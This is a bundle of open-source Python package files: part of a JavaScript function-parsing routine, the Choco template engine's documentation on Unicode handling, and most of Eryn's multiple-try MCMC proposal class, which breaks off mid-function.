if n and source[n - 1] in IDENTIFIER_PART:
n += 1
continue
if source[n:n + 8] == 'function' and source[n +
8] not in IDENTIFIER_PART:
if source[:n].rstrip().endswith(
'.'): # allow function as a property name :)
n += 1
continue
if source[n + 8:].lstrip().startswith(
':'): # allow functions inside objects...
n += 1
continue
entered = n
res += source[last:n]
name = ''
n = pass_white(source, n + 8)
if source[n] in IDENTIFIER_START: # hoisted function
name, n = parse_identifier(source, n)
args, n = pass_bracket(source, n, '()')
if not args:
raise SyntaxError('Function misses bracket with argnames ()')
args = args.strip('() \n')
args = tuple(parse_identifier(e, 0)[0]
for e in argsplit(args)) if args else ()
if len(args) - len(set(args)):
# I know its legal in JS but python does not allow duplicate argnames
# I will not work around it
raise SyntaxError(
'Function has duplicate argument names. Its not legal in this implementation. Sorry.'
)
block, n = pass_bracket(source, n, '{}')
if not block:
raise SyntaxError(
'Function does not have any code block to execute')
mixed = False # named function expression flag
if name and not all_inline:
# Here I will distinguish between named function expression (mixed) and a function statement
before = source[:entered].rstrip()
if any(endswith_keyword(before, e) for e in PRE_EXP_STARTS):
#print 'Ended ith keyword'
mixed = True
elif before and before[-1] not in PRE_ALLOWED and not before[
-2:] in INCREMENTS:
#print 'Ended with'+repr(before[-1]), before[-1]=='}'
mixed = True
else:
#print 'FUNCTION STATEMENT'
#its a function statement.
# todo remove fucking label if present!
hoisted[name] = block, args
if not name or mixed or all_inline: # its a function expression (can be both named and not named)
#print 'FUNCTION EXPRESSION'
INLINE_COUNT += 1
iname = INLINE_NAME % INLINE_COUNT # inline name
res += ' ' + iname
inline['%s@%s' % (
iname, name
)] = block, args #here added real name at the end because it has to be added to the func scope
last = n
else:
n += 1
res += source[last:]
return res, hoisted, inline
if __name__ == '__main__':
print(remove_functions(
'5+5 function n (functiona ,functionaj) {dsd s, dsdd}')) | PypiClean |
/Choco-1.0.5.tar.gz/Choco-1.0.5/doc/build/unicode.rst | .. _unicode_toplevel:
===================
The Unicode Chapter
===================
The Python language supports two ways of representing what we
know as "strings", i.e. series of characters. In Python 2, the
two types are ``string`` and ``unicode``, and in Python 3 they are
``bytes`` and ``string``. A key aspect of the Python 2 ``string`` and
Python 3 ``bytes`` types are that they contain no information
regarding what **encoding** the data is stored in. For this
reason they were commonly referred to as **byte strings** on
Python 2, and Python 3 makes this name more explicit. The
origins of this come from Python's background of being developed
before the Unicode standard was even available, back when
strings were C-style strings and were just that, a series of
bytes. Strings that had only values below 128 just happened to
be **ASCII** strings and were printable on the console, whereas
strings with values above 128 would produce all kinds of
graphical characters and bells.
Contrast the "byte-string" type with the "unicode/string" type.
Objects of this latter type are created whenever you say something like
``u"hello world"`` (or in Python 3, just ``"hello world"``). In this
case, Python represents each character in the string internally
using multiple bytes per character (something similar to
UTF-16). What's important is that when using the
``unicode``/``string`` type to store strings, Python knows the
data's encoding; it's in its own internal format. Whereas when
using the ``string``/``bytes`` type, it does not.
When Python 2 attempts to treat a byte-string as a string, which
means it's attempting to compare/parse its characters, to coerce
it into another encoding, or to decode it to a unicode object,
it has to guess what the encoding is. In this case, it will
pretty much always guess the encoding as ``ascii``... and if the
byte-string contains bytes above value 128, you'll get an error.
Python 3 eliminates much of this confusion by just raising an
error unconditionally if a byte-string is used in a
character-aware context.
There is one operation that Python *can* do with a non-ASCII
byte-string, and it's a great source of confusion: it can dump the
byte-string straight out to a stream or a file, with nary a care
what the encoding is. To Python, this is pretty much like
dumping any other kind of binary data (like an image) to a
stream somewhere. In Python 2, it is common to see programs that
embed all kinds of international characters and encodings into
plain byte-strings (i.e. using ``"hello world"`` style literals)
can fly right through their run, sending reams of strings out to
wherever they are going, and the programmer, seeing the same
output as was expressed in the input, is now under the illusion
that his or her program is Unicode-compliant. In fact, their
program has no unicode awareness whatsoever, and similarly has
no ability to interact with libraries that *are* unicode aware.
Python 3 makes this much less likely by defaulting to unicode as
the storage format for strings.
The "pass through encoded data" scheme is what template
languages like Cheetah and earlier versions of Myghty do by
default. Choco as of version 0.2 also supports this mode of
operation when using Python 2, using the ``disable_unicode=True``
flag. However, when using Choco in its default mode of
unicode-aware, it requires explicitness when dealing with
non-ASCII encodings. Additionally, if you ever need to handle
unicode strings and other kinds of encoding conversions more
intelligently, the usage of raw byte-strings quickly becomes a
nightmare, since you are sending the Python interpreter
collections of bytes for which it can make no intelligent
decisions with regards to encoding. In Python 3 Choco only allows
usage of native, unicode strings.
In normal Choco operation, all parsed template constructs and
output streams are handled internally as Python ``unicode``
objects. It's only at the point of :meth:`~.Template.render` that this unicode
stream may be rendered into whatever the desired output encoding
is. The implication here is that the template developer must
:ensure that :ref:`the encoding of all non-ASCII templates is explicit
<set_template_file_encoding>` (still required in Python 3),
that :ref:`all non-ASCII-encoded expressions are in one way or another
converted to unicode <handling_non_ascii_expressions>`
(not much of a burden in Python 3), and that :ref:`the output stream of the
template is handled as a unicode stream being encoded to some
encoding <defining_output_encoding>` (still required in Python 3).
.. _set_template_file_encoding:
Specifying the Encoding of a Template File
==========================================
This is the most basic encoding-related setting, and it is
equivalent to Python's "magic encoding comment", as described in
`pep-0263 <http://www.python.org/dev/peps/pep-0263/>`_. Any
template that contains non-ASCII characters requires that this
comment be present so that Choco can decode to unicode (and also
make usage of Python's AST parsing services). Choco's lexer will
use this encoding in order to convert the template source into a
``unicode`` object before continuing its parsing:
.. sourcecode:: choco
## -*- coding: utf-8 -*-
Alors vous imaginez ma surprise, au lever du jour, quand
une drôle de petite voix m’a réveillé. Elle disait:
« S’il vous plaît… dessine-moi un mouton! »
For the picky, the regular expression used is derived from that
of the above mentioned pep:
.. sourcecode:: python
#.*coding[:=]\s*([-\w.]+).*\n
The lexer will convert to unicode in all cases, so that if any
characters exist in the template that are outside of the
specified encoding (or the default of ``ascii``), the error will
be immediate.
As an alternative, the template encoding can be specified
programmatically to either :class:`.Template` or :class:`.TemplateLookup` via
the ``input_encoding`` parameter:
.. sourcecode:: python
t = TemplateLookup(directories=['./'], input_encoding='utf-8')
The above will assume all located templates specify ``utf-8``
encoding, unless the template itself contains its own magic
encoding comment, which takes precedence.
.. _handling_non_ascii_expressions:
Handling Expressions
====================
The next area that encoding comes into play is in expression
constructs. By default, Choco's treatment of an expression like
this:
.. sourcecode:: choco
${"hello world"}
looks something like this:
.. sourcecode:: python
context.write(unicode("hello world"))
In Python 3, it's just:
.. sourcecode:: python
context.write(str("hello world"))
That is, **the output of all expressions is run through the
``unicode`` built-in**. This is the default setting, and can be
modified to expect various encodings. The ``unicode`` step serves
both the purpose of rendering non-string expressions into
strings (such as integers or objects which contain ``__str()__``
methods), and to ensure that the final output stream is
constructed as a unicode object. The main implication of this is
that **any raw byte-strings that contain an encoding other than
ASCII must first be decoded to a Python unicode object**. It
means you can't say this in Python 2:
.. sourcecode:: choco
${"voix m’a réveillé."} ## error in Python 2!
You must instead say this:
.. sourcecode:: choco
${u"voix m’a réveillé."} ## OK !
Similarly, if you are reading data from a file that is streaming
bytes, or returning data from some object that is returning a
Python byte-string containing a non-ASCII encoding, you have to
explicitly decode to unicode first, such as:
.. sourcecode:: choco
${call_my_object().decode('utf-8')}
Note that filehandles acquired by ``open()`` in Python 3 default
to returning "text", that is the decoding is done for you. See
Python 3's documentation for the ``open()`` built-in for details on
this.
If you want a certain encoding applied to *all* expressions,
override the ``unicode`` builtin with the ``decode`` built-in at the
:class:`.Template` or :class:`.TemplateLookup` level:
.. sourcecode:: python
t = Template(templatetext, default_filters=['decode.utf8'])
Note that the built-in ``decode`` object is slower than the
``unicode`` function, since unlike ``unicode`` it's not a Python
built-in, and it also checks the type of the incoming data to
determine if string conversion is needed first.
The ``default_filters`` argument can be used to entirely customize
the filtering process of expressions. This argument is described
in :ref:`filtering_default_filters`.
.. _defining_output_encoding:
Defining Output Encoding
========================
Now that we have a template which produces a pure unicode output
stream, all the hard work is done. We can take the output and do
anything with it.
As stated in the :doc:`"Usage" chapter <usage>`, both :class:`.Template` and
:class:`.TemplateLookup` accept ``output_encoding`` and ``encoding_errors``
parameters which can be used to encode the output in any Python
supported codec:
.. sourcecode:: python
from choco.template import Template
from choco.lookup import TemplateLookup
mylookup = TemplateLookup(directories=['/docs'], output_encoding='utf-8', encoding_errors='replace')
mytemplate = mylookup.get_template("foo.txt")
print(mytemplate.render())
:meth:`~.Template.render` will return a ``bytes`` object in Python 3 if an output
encoding is specified. By default it performs no encoding and
returns a native string.
:meth:`~.Template.render_unicode` will return the template output as a Python
``unicode`` object (or ``string`` in Python 3):
.. sourcecode:: python
print(mytemplate.render_unicode())
The above method disgards the output encoding keyword argument;
you can encode yourself by saying:
.. sourcecode:: python
print(mytemplate.render_unicode().encode('utf-8', 'replace'))
Buffer Selection
----------------
Choco does play some games with the style of buffering used
internally, to maximize performance. Since the buffer is by far
the most heavily used object in a render operation, it's
important!
When calling :meth:`~.Template.render` on a template that does not specify any
output encoding (i.e. it's ``ascii``), Python's ``cStringIO`` module,
which cannot handle encoding of non-ASCII ``unicode`` objects
(even though it can send raw byte-strings through), is used for
buffering. Otherwise, a custom Choco class called
``FastEncodingBuffer`` is used, which essentially is a super
dumbed-down version of ``StringIO`` that gathers all strings into
a list and uses ``u''.join(elements)`` to produce the final output
-- it's markedly faster than ``StringIO``.
.. _unicode_disabled:
Saying to Heck with It: Disabling the Usage of Unicode Entirely
===============================================================
Some segments of Choco's userbase choose to make no usage of
Unicode whatsoever, and instead would prefer the "pass through"
approach; all string expressions in their templates return
encoded byte-strings, and they would like these strings to pass
right through. The only advantage to this approach is that
templates need not use ``u""`` for literal strings; there's an
arguable speed improvement as well since raw byte-strings
generally perform slightly faster than unicode objects in
Python. For these users, assuming they're sticking with Python
2, they can hit the ``disable_unicode=True`` flag as so:
.. sourcecode:: python
# -*- coding:utf-8 -*-
from choco.template import Template
t = Template("drôle de petite voix m’a réveillé.", disable_unicode=True, input_encoding='utf-8')
print(t.code)
The ``disable_unicode`` mode is strictly a Python 2 thing. It is
not supported at all in Python 3.
The generated module source code will contain elements like
these:
.. sourcecode:: python
# -*- coding:utf-8 -*-
# ...more generated code ...
def render_body(context,**pageargs):
context.caller_stack.push_frame()
try:
__M_locals = dict(pageargs=pageargs)
# SOURCE LINE 1
context.write('dr\xc3\xb4le de petite voix m\xe2\x80\x99a r\xc3\xa9veill\xc3\xa9.')
return ''
finally:
context.caller_stack.pop_frame()
Where above that the string literal used within :meth:`.Context.write`
is a regular byte-string.
When ``disable_unicode=True`` is turned on, the ``default_filters``
argument which normally defaults to ``["unicode"]`` now defaults
to ``["str"]`` instead. Setting ``default_filters`` to the empty list
``[]`` can remove the overhead of the ``str`` call. Also, in this
mode you **cannot** safely call :meth:`~.Template.render_unicode` -- you'll get
unicode/decode errors.
The ``h`` filter (HTML escape) uses a less performant pure Python
escape function in non-unicode mode. This because
MarkupSafe only supports Python unicode objects for non-ASCII
strings.
.. versionchanged:: 0.3.4
In prior versions, it used ``cgi.escape()``, which has been replaced
with a function that also escapes single quotes.
Rules for using ``disable_unicode=True``
----------------------------------------
* Don't use this mode unless you really, really want to and you
absolutely understand what you're doing.
* Don't use this option just because you don't want to learn to
use Unicode properly; we aren't supporting user issues in this
mode of operation. We will however offer generous help for the
vast majority of users who stick to the Unicode program.
* Python 3 is unicode by default, and the flag is not available
when running on Python 3.
| PypiClean |
/Eryn-1.1.4.tar.gz/Eryn-1.1.4/eryn/moves/multipletry.py | from multiprocessing.sharedctypes import Value
import numpy as np
import warnings
from copy import deepcopy
from abc import ABC
# from scipy.special import logsumexp
try:
import cupy as xp
gpu_available = True
except (ModuleNotFoundError, ImportError):
import numpy as xp
gpu_available = False
from .rj import ReversibleJumpMove
from ..prior import ProbDistContainer
from ..utils.utility import groups_from_inds
___ = ["MultipleTryMove"]
def logsumexp(a, axis=None, xp=None):
if xp is None:
xp = np
max = xp.max(a, axis=axis)
ds = a - max[:, None]
sum_of_exp = xp.exp(ds).sum(axis=axis)
return max + xp.log(sum_of_exp)
class MultipleTryMove(ABC):
"""Generate multiple proposal tries.
This class should be inherited by another proposal class
with the ``@classmethods`` overwritten. See :class:`eryn.moves.MTDistGenMove`
and :class:`MTDistGenRJ` for examples.
Args:
num_try (int, optional): Number of tries. (default: 1)
independent (bool, optional): Set to ``True`` if the proposal is independent of the current points.
(default: ``False``).
symmetric (bool, optional): Set to ``True`` if the proposal is symmetric.
(default: ``False``).
rj (bool, optional): Set to ``True`` if this is a nested reversible jump proposal.
(default: ``False``).
**kwargs (dict, optional): for compatibility with other proposals.
Raises:
ValueError: Input issues.
"""
def __init__(
self, num_try=1, independent=False, symmetric=False, rj=False, xp=None, **kwargs
):
# TODO: add in xp
self.num_try = num_try
self.independent = independent
self.symmetric = symmetric
self.rj = rj
if self.rj:
if self.symmetric or self.independent:
raise ValueError(
"If rj==True, symmetric and independt must both be False."
)
if xp is None:
xp = np
self.xp = xp
@classmethod
def special_like_func(self, generated_coords, *args, inds_leaves_rj=None, **kwargs):
"""Calculate the Likelihood for sampled points.
Args:
generated_coords (np.ndarray): Generated coordinates with shape ``(number of independent walkers, num_try)``.
*args (tuple, optional): additional arguments passed by overwriting the
``get_proposal`` function and passing ``args_like`` keyword argument.
inds_leaves_rj (np.ndarray): Index into each individual walker giving the
leaf index associated with this proposal. Should only be used if ``self.rj is True``. (default: ``None``)
**kwargs (tuple, optional): additional keyword arguments passed by overwriting the
``get_proposal`` function and passing ``kwargs_like`` keyword argument.
Returns:
np.ndarray: Likelihood values with shape ``(generated_coords.shape[0], num_try).``
Raises:
NotImplementedError: Function not included.
"""
raise NotImplementedError
@classmethod
def special_prior_func(self, generated_coords, *args, **kwargs):
"""Calculate the Prior for sampled points.
Args:
generated_coords (np.ndarray): Generated coordinates with shape ``(number of independent walkers, num_try)``.
*args (tuple, optional): additional arguments passed by overwriting the
``get_proposal`` function and passing ``args_prior`` keyword argument.
inds_leaves_rj (np.ndarray): Index into each individual walker giving the
leaf index associated with this proposal. Should only be used if ``self.rj is True``. (default: ``None``)
**kwargs (tuple, optional): additional keyword arguments passed by overwriting the
``get_proposal`` function and passing ``kwargs_prior`` keyword argument.
Returns:
np.ndarray: Prior values with shape ``(generated_coords.shape[0], num_try).``
Raises:
NotImplementedError: Function not included.
"""
raise NotImplementedError
@classmethod
def special_generate_func(
coords, random, size=1, *args, fill_tuple=None, fill_values=None, **kwargs
):
"""Generate samples and calculate the logpdf of their proposal function.
Args:
coords (np.ndarray): Current coordinates of walkers.
random (obj): Random generator.
*args (tuple, optional): additional arguments passed by overwriting the
``get_proposal`` function and passing ``args_generate`` keyword argument.
size (int, optional): Number of tries to generate.
fill_tuple (tuple, optional): Length 2 tuple with the indexing of which values to fill
when generating. Can be used for auxillary proposals or reverse RJ proposals. First index is the index into walkers and the second index is
the index into the number of tries. (default: ``None``)
fill_values (np.ndarray): values to fill associated with ``fill_tuple``. Should
have size ``(len(fill_tuple[0]), ndim)``. (default: ``None``).
**kwargs (tuple, optional): additional keyword arguments passed by overwriting the
``get_proposal`` function and passing ``kwargs_generate`` keyword argument.
Returns:
tuple: (generated points, logpdf of generated points).
Raises:
NotImplementedError: Function not included.
"""
raise NotImplementedError
@classmethod
def special_generate_logpdf(self, coords):
"""Get logpdf of generated coordinates.
Args:
coords (np.ndarray): Current coordinates of walkers.
Returns:
np.ndarray: logpdf of generated points.
Raises:
NotImplementedError: Function not included.
"""
raise NotImplementedError
def get_mt_log_posterior(self, ll, lp, betas=None):
"""Calculate the log of the posterior for all tries.
Args:
ll (np.ndarray): Log Likelihood values with shape ``(nwalkers, num_tries)``.
lp (np.ndarray): Log Prior values with shape ``(nwalkers, num_tries)``.
betas (np.ndarray, optional): Inverse temperatures to include in log Posterior computation.
(default: ``None``)
Returns:
np.ndarray: Log of the Posterior with shape ``(nwalkers, num_tries)``.
"""
if betas is None:
ll_temp = ll.copy()
else:
assert isinstance(betas, self.xp.ndarray)
if ll.ndim > 1:
betas_tmp = self.xp.expand_dims(betas, ll.ndim - 1)
else:
betas_tmp = betas
ll_temp = betas_tmp * ll
return ll_temp + lp
def readout_adjustment(self, out_vals, all_vals_prop, aux_all_vals):
"""Read out values from the proposal.
Allows the user to read out any values from the proposal that may be needed elsewhere. This function must be overwritten.
Args:
out_vals (list): ``[logP_out, ll_out, lp_out, log_proposal_pdf_out, log_sum_weights]``.
all_vals_prop (list): ``[logP, ll, lp, log_proposal_pdf, log_sum_weights]``.
aux_all_vals (list): ``[aux_logP, aux_ll, aux_lp, aux_log_proposal_pdf, aux_log_sum_weights]``.
"""
pass
def get_mt_proposal(
self,
coords,
random,
args_generate=(),
kwargs_generate={},
args_like=(),
kwargs_like={},
args_prior=(),
kwargs_prior={},
betas=None,
ll_in=None,
lp_in=None,
inds_leaves_rj=None,
inds_reverse_rj=None,
):
"""Make a multiple-try proposal
Here, ``nwalkers`` refers to all independent walkers which generally
will mean ``nwalkers * ntemps`` in terms of the rest of the sampler.
Args:
coords (np.ndarray): Current coordinates of walkers.
random (obj): Random generator.
args_generate (tuple, optional): Additional ``*args`` to pass to generate function.
Must overwrite ``get_proposal`` function to use these.
(default: ``()``)
kwargs_generate (dict, optional): Additional ``**kwargs`` to pass to generate function.
(default: ``{}``)
Must overwrite ``get_proposal`` function to use these.
args_like (tuple, optional): Additional ``*args`` to pass to Likelihood function.
Must overwrite ``get_proposal`` function to use these.
(default: ``()``)
kwargs_like (dict, optional): Additional ``**kwargs`` to pass to Likelihood function.
Must overwrite ``get_proposal`` function to use these.
(default: ``{}``)
args_prior (tuple, optional): Additional ``*args`` to pass to Prior function.
Must overwrite ``get_proposal`` function to use these.
(default: ``()``)
kwargs_prior (dict, optional): Additional ``**kwargs`` to pass to Prior function.
Must overwrite ``get_proposal`` function to use these.
(default: ``{}``)
betas (np.ndarray, optional): Inverse temperatures passes to the proposal with shape ``(nwalkers,)``.
ll_in (np.ndarray, optional): Log Likelihood values coming in for current coordinates. Must be provided
if ``self.rj is True``. If ``self.rj is True``, must be nested.
Also, for all proposed removals, this value must be the Likelihood with the binary
removed so all proposals are pretending to add a binary.
Useful if ``self.independent is True``. (default: ``None``)
lp_in (np.ndarray, optional): Log Prior values coming in for current coordinates. Must be provided
if ``self.rj is True``. If ``self.rj is True``, must be nested.
Also, for all proposed removals, this value must be the Likelihood with the binary
removed so all proposals are pretending to add a binary.
Useful if ``self.independent is True``. (default: ``None``)
inds_leaves_rj (np.ndarray, optional): Array giving the leaf index of each incoming walker.
Must be provided if ``self.rj is True``. (default: ``None``)
inds_reverse_rj (np.ndarray, optional): Array giving the walker index for which proposals are
reverse proposal removing a leaf.
Must be provided if ``self.rj is True``. (default: ``None``)
Returns:
tuple: (generated points, factors).
Raises:
ValueError: Inputs are incorrect.
"""
# check if rj and make sure we have all the information in that case
if self.rj:
try:
assert ll_in is not None and lp_in is not None
assert inds_leaves_rj is not None and inds_reverse_rj is not None
except AssertionError:
raise ValueError(
"If using rj, must provide ll_in, lp_in, inds_leaves_rj, and inds_reverse_rj."
)
# if using reversible jump, fill first spot with values that are proposed to remove
fill_tuple = (inds_reverse_rj, np.zeros_like(inds_reverse_rj))
fill_values = coords[inds_reverse_rj]
else:
fill_tuple = None
fill_values = None
# generate new points and get log of the proposal probability
generated_points, log_proposal_pdf = self.special_generate_func(
coords,
random,
*args_generate,
size=self.num_try,
fill_values=fill_values,
fill_tuple=fill_tuple,
**kwargs_generate
)
# compute the Likelihood functions
ll = self.special_like_func(
generated_points, *args_like, inds_leaves_rj=inds_leaves_rj, **kwargs_like
)
# check for nans
if self.xp.any(self.xp.isnan(ll)):
warnings.warn("Getting nans for ll in multiple try.")
ll[self.xp.isnan(ll)] = -1e300
# compute the Prior functions
lp = self.special_prior_func(
generated_points, *args_prior, inds_leaves_rj=inds_leaves_rj, **kwargs_prior
)
# if rj, make proposal distribution for all other leaves the prior value
# this will properly cancel the prior with the proposal for leaves that already exists
if self.rj:
log_proposal_pdf += lp_in[:, None]
# get posterior distribution including tempering
logP = self.get_mt_log_posterior(ll, lp, betas=betas)
# set weights based on if symmetric
if self.symmetric:
log_importance_weights = logP
else:
log_importance_weights = logP - log_proposal_pdf
# get the sum of weights
log_sum_weights = logsumexp(log_importance_weights, axis=-1, xp=self.xp)
# probs = wi / sum(wi)
log_of_probs = log_importance_weights - log_sum_weights[:, None]
# probabilities to choose try
probs = self.xp.exp(log_of_probs)
# draw based on likelihood
inds_keep = (
probs.cumsum(1) > self.xp.random.rand(probs.shape[0])[:, None]
).argmax(1)
# tuple of index arrays of which try chosen per walker
inds_tuple = (self.xp.arange(len(inds_keep)), inds_keep)
if self.rj:
# this just ensures the cancellation of logP and aux_logP outside of proposal
inds_tuple[1][inds_reverse_rj] = 0
# get chosen prior, Likelihood, posterior information
lp_out = lp[inds_tuple]
ll_out = ll[inds_tuple]
logP_out = logP[inds_tuple]
# store this information for access outside of multiple try part
self.mt_lp = lp_out
self.mt_ll = ll_out
# choose points and get the log of the proposal for storage
generated_points_out = generated_points[inds_tuple].copy() # theta^j
log_proposal_pdf_out = log_proposal_pdf[inds_tuple]
# prepare auxillary information based on if it is nested rj, independent, or not
if self.independent:
# if independent, all the tries can be repeated for the auxillary draws
aux_ll = ll.copy()
aux_lp = lp.copy()
# sub in the generation pdf for the current coordinates
aux_log_proposal_pdf_sub = self.special_generate_logpdf(coords)
# set sub ll based on if it is provided
if ll_in is None:
aux_ll_sub = self.special_generate_like(coords)
else:
assert ll_in.shape[0] == coords.shape[0]
aux_ll_sub = ll_in
# set sub lp based on if it is provided
if lp_in is None:
aux_lp_sub = self.special_generate_prior(coords)
else:
assert lp_in.shape[0] == coords.shape[0]
aux_lp_sub = lp_in
# sub in this information from the current coordinates
aux_ll[inds_tuple] = aux_ll_sub
aux_lp[inds_tuple] = aux_lp_sub
# get auxillary posterior
aux_logP = self.get_mt_log_posterior(aux_ll, aux_lp, betas=betas)
# get aux_log_proposal_pdf information
aux_log_proposal_pdf = log_proposal_pdf.copy()
aux_log_proposal_pdf[inds_tuple] = aux_log_proposal_pdf_sub
# set auxillary weights
aux_log_importance_weights = aux_logP - aux_log_proposal_pdf
elif self.rj:
# in rj, set aux_ll and aux_lp to be repeats of the model with one less leaf
aux_ll = np.repeat(ll_in[:, None], self.num_try, axis=-1)
aux_lp = np.repeat(lp_in[:, None], self.num_try, axis=-1)
# probability is the prior for the existing points
aux_log_proposal_pdf = aux_lp.copy()
# get log posterior
aux_logP = self.get_mt_log_posterior(aux_ll, aux_lp, betas=betas)
# get importance weights
aux_log_importance_weights = aux_logP - aux_log_proposal_pdf
else:
# generate auxillary points based on chosen new points
aux_generated_points, aux_log_proposal_pdf = self.special_generate_func(
generated_points_out,
random,
*args_generate,
size=self.num_try,
fill_tuple=inds_tuple,
fill_values=generated_points_out,
**kwargs_generate
)
# get ll, lp, and lP
aux_ll = self.special_like_func(
aux_generated_points, *args_like, **kwargs_like
)
aux_lp = self.special_prior_func(aux_generated_points)
aux_logP = self.get_mt_log_posterior(aux_ll, aux_lp, betas=betas)
# set auxillary weights
if not self.symmetric:
aux_log_importance_weights = aux_logP - aux_log_proposal_pdf_sub
else:
aux_log_importance_weights = aux_logP
# chosen output old Posteriors
aux_logP_out = aux_logP[inds_tuple]
# get sum of log weights
aux_log_sum_weights = logsumexp(aux_log_importance_weights, axis=-1, xp=self.xp)
aux_log_proposal_pdf_out = aux_log_proposal_pdf[inds_tuple]
# this is setup to make clear with the math.
# setting up factors properly means the
# final lnpdiff will be effectively be the ratio of the sums
# of the weights
# IMPORTANT: logP_out must be subtracted against log_sum_weights before anything else due to -1e300s.
factors = (
(aux_logP_out - aux_log_sum_weights)
- aux_log_proposal_pdf_out
+ aux_log_proposal_pdf_out
) - ((logP_out - log_sum_weights) - log_proposal_pdf_out + log_proposal_pdf_out)
if self.rj:
# adjust all information for reverese rj proposals
factors[inds_reverse_rj] *= -1
self.mt_ll[inds_reverse_rj] = ll_in[inds_reverse_rj]
self.mt_lp[inds_reverse_rj] = lp_in[inds_reverse_rj]
# store output information
self.aux_logP_out = aux_logP_out
self.logP_out = logP_out
self.aux_ll = aux_ll
self.aux_lp = aux_lp
self.log_sum_weights = log_sum_weights
self.aux_log_sum_weights = aux_log_sum_weights
if self.rj:
self.inds_reverse_rj = inds_reverse_rj
self.inds_forward_rj = np.delete(
np.arange(coords.shape[0]), inds_reverse_rj
)
# prepare to readout any information the user would like in readout_adjustment
out_vals = [logP_out, ll_out, lp_out, log_proposal_pdf_out, log_sum_weights]
all_vals_prop = [logP, ll, lp, log_proposal_pdf, log_sum_weights]
aux_all_vals = [
aux_logP,
aux_ll,
aux_lp,
aux_log_proposal_pdf,
aux_log_sum_weights,
]
self.readout_adjustment(out_vals, all_vals_prop, aux_all_vals)
return (
generated_points_out,
factors,
)
def get_proposal(self, branches_coords, random, branches_inds=None, **kwargs):
"""Get proposal
Args:
branches_coords (dict): Keys are ``branch_names`` and values are
np.ndarray[ntemps, nwalkers, nleaves_max, ndim] representing
coordinates for walkers.
random (object): Current random state object.
branches_inds (dict, optional): Keys are ``branch_names`` and values are
np.ndarray[ntemps, nwalkers, nleaves_max] representing which
leaves are currently being used. (default: ``None``)
**kwargs (ignored): This is added for compatibility. It is ignored in this function.
Returns:
tuple: (Proposed coordinates, factors) -> (dict, np.ndarray)
Raises:
ValueError: Input issues.
"""
# mutliple try is only made for one branch here
if len(list(branches_coords.keys())) > 1:
raise ValueError("Can only propose change to one model at a time with MT.")
# get main key
key_in = list(branches_coords.keys())[0]
self.key_in = key_in
# get inds information
if branches_inds is None:
branches_inds = {}
branches_inds[key_in] = np.ones(
branches_coords[key_in].shape[:-1], dtype=bool
)
# Make sure for base proposals that there is only one leaf
if np.any(branches_inds[key_in].sum(axis=-1) > 1):
raise ValueError
ntemps, nwalkers, _, _ = branches_coords[key_in].shape
# get temperature information
betas_here = np.repeat(
self.temperature_control.betas[:, None],
np.prod(branches_coords[key_in].shape[1:-1]),
).reshape(branches_inds[key_in].shape)[branches_inds[key_in]]
# previous Likelihoods in case proposal is independent
ll_here = np.repeat(
self.current_state.log_like[:, :, None],
branches_coords[key_in].shape[2],
axis=-1,
).reshape(branches_inds[key_in].shape)[branches_inds[key_in]]
# previous Priors in case proposal is independent
lp_here = np.repeat(
self.current_state.log_prior[:, :, None],
branches_coords[key_in].shape[2],
axis=-1,
).reshape(branches_inds[key_in].shape)[branches_inds[key_in]]
# get mt proposal
generated_points, factors = self.get_mt_proposal(
branches_coords[key_in][branches_inds[key_in]],
random,
betas=betas_here,
ll_in=ll_here,
lp_in=lp_here,
)
# store this information for access outside
self.mt_ll = self.mt_ll.reshape(ntemps, nwalkers)
self.mt_lp = self.mt_lp.reshape(ntemps, nwalkers)
return (
{key_in: generated_points.reshape(ntemps, nwalkers, 1, -1)},
factors.reshape(ntemps, nwalkers),
)
class MultipleTryMoveRJ(MultipleTryMove):
def get_proposal(
self, branches_coords, branches_inds, nleaves_min_all, nleaves_max_all, random, **kwargs
):
"""Make a proposal
Args:
all_coords (dict): Keys are ``branch_names``. Values are
np.ndarray[ntemps, nwalkers, nleaves_max, ndim]. These are the curent
coordinates for all the walkers.
all_inds (dict): Keys are ``branch_names``. Values are
np.ndarray[ntemps, nwalkers, nleaves_max]. These are the boolean
arrays marking which leaves are currently used within each walker.
nleaves_min_all (list): Minimum values of leaf ount for each model. Must have same order as ``all_cords``.
nleaves_max_all (list): Maximum values of leaf ount for each model. Must have same order as ``all_cords``.
random (object): Current random state of the sampler.
**kwargs (ignored): For modularity.
Returns:
tuple: Tuple containing proposal information.
First entry is the new coordinates as a dictionary with keys
as ``branch_names`` and values as
``double `` np.ndarray[ntemps, nwalkers, nleaves_max, ndim] containing
proposed coordinates. Second entry is the new ``inds`` array with
boolean values flipped for added or removed sources. Third entry
is the factors associated with the
proposal necessary for detailed balance. This is effectively
any term in the detailed balance fraction. +log of factors if
in the numerator. -log of factors if in the denominator.
"""
if len(list(branches_coords.keys())) > 1:
raise ValueError("Can only propose change to one model at a time with MT.")
# get main key
key_in = list(branches_coords.keys())[0]
self.key_in = key_in
if branches_inds is None:
raise ValueError("In MT RJ proposal, branches_inds cannot be None.")
ntemps, nwalkers, nleaves_max, ndim = branches_coords[key_in].shape
# get temperature information
betas_here = np.repeat(
self.temperature_control.betas[:, None], nwalkers, axis=-1
).flatten()
# current Likelihood and prior information
ll_here = self.current_state.log_like.flatten()
lp_here = self.current_state.log_prior.flatten()
# do rj setup
assert len(nleaves_min_all) == 1 and len(nleaves_max_all) == 1
nleaves_min = nleaves_min_all[key_in]
nleaves_max = nleaves_max_all[key_in]
if nleaves_min == nleaves_max:
raise ValueError("MT RJ proposal requires that nleaves_min != nleaves_max.")
elif nleaves_min > nleaves_max:
raise ValueError("nleaves_min is greater than nleaves_max. Not allowed.")
# get the inds adjustment information
all_inds_for_change = self.get_model_change_proposal(
branches_inds[key_in], random, nleaves_min, nleaves_max
)
# preparing leaf information for going into the proposal
inds_leaves_rj = np.zeros(ntemps * nwalkers, dtype=int)
coords_in = np.zeros((ntemps * nwalkers, ndim))
inds_reverse_rj = None
# prepare proposal dictionaries
new_inds = deepcopy(branches_inds)
q = deepcopy(branches_coords)
for change in all_inds_for_change.keys():
if change not in ["+1", "-1"]:
raise ValueError("MT RJ is only implemented for +1/-1 moves.")
# get indicies of changing leaves
temp_inds = all_inds_for_change[change][:, 0]
walker_inds = all_inds_for_change[change][:, 1]
leaf_inds = all_inds_for_change[change][:, 2]
# leaf index to change
inds_leaves_rj[temp_inds * nwalkers + walker_inds] = leaf_inds
coords_in[temp_inds * nwalkers + walker_inds] = branches_coords[key_in][
(temp_inds, walker_inds, leaf_inds)
]
# adjustment of indices
new_val = {"+1": True, "-1": False}[change]
# adjust indices
